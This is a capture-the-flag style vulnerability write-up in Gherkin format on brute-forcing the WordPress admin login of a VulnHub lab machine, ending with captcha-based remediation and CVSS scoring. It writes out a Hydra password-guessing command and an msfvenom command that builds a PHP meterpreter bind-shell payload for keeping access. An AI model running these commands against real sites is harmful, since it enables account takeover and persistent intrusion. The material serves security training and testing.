## Version 1.4.1
## language: en

Feature:
  TOE:
    vulnhub
  Location:
    http://funbox.fritz.box/wp-login.php
  CWE:
    CWE-307: Improper Restriction of Excessive Authentication Attempts
  Rule:
    REQ.R237: R237. Ascertain human interaction
  Goal:
    Login as admin
  Recommendation:
    Implement a captcha system

  Background:
  Hacker's software:
    | <Software name> | <Version>   |
    | Arch Linux      | 2020.08.01  |
    | Firefox         | 79.0        |
    | Hydra           | v9.0        |
    | Metasploit      | v5.0.99-dev |
    | Virtual Box     | 6.1         |
  TOE information:
    Given I am accessing the at 192.168.1.74
    And I added the domain "funbox.fritz.box" in my "hosts" file
    """
    192.168.1.74    funbox.fritz.box    funbox.fritz.box
    """
    And it runs on a virtualbox

  Scenario: Normal use case
    Given I access http://funbox.fritz.box/wp-login.php
    And I see a login form
    And and if the credentials are wrong I get [evidence](error.png)

  Scenario: Static detection
    Given I don't have access to the source code
    Then I can not do a static detection

  Scenario: Dynamic detection
    Given I am in the login form
    When I try several wrong credentials
    Then I get the error [evidence](error.png)
    And I can conclude that I can try a bruteforce attack

  Scenario: Exploitation
    Given I know I can try a bruteforce attack
    When I run hydra
    """
    hydra -l admin -P password.lst funbox.fritz.box -V http-form-post \
    "/wp-login.php:log=^USER^&pwd=^PASS^:login_error"
    """
    Then I get admin's passwd [evidence](passwd.png)
    And I can conclude that the site can be exploited

  Scenario: Maintaining access
    Given that now I have access to the WP admin area
    And I can execute PHP code
    And I can generate a payload with "Metasploit"
    """
    $ msfvenom -p php/meterpreter/bind_tcp -f raw > shell.php
    """
    When I run the output of "msfvenom"
    Then I get a meterpreter session [evidence](meterpreter.png)
    And I can conclude that I can mantain access

  Scenario: Remediation
    Given I have patched the code by installing the plugin "Captcha Bank"
    When If I try again
    """
    hydra -l admin -P password.lst funbox.fritz.box -V http-form-post \
    "/wp-login.php:log=^USER^&pwd=^PASS^:login_error"
    """
    Then I get [evidence](fixed.png)
    And I can confirm that the vulnerability was successfully patched

  Scenario: Scoring
  Base: Attributes that are constants over time and organizations
    10.0 (Critical) - AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
  Temporal: Attributes that measure the exploit's popularity and fixability
    9.5 (Critical) - E:H/RL:O/RC:C
  Environmental: Unique and relevant attributes to a specific user environment
    9.5 (Critical) - MAV:N/MAC:L/MPR:N/MUI:N/MS:C/MC:H/MI:H/MA:H

  Scenario: Correlations
    No correlations have been found to this date {2020-08-10}
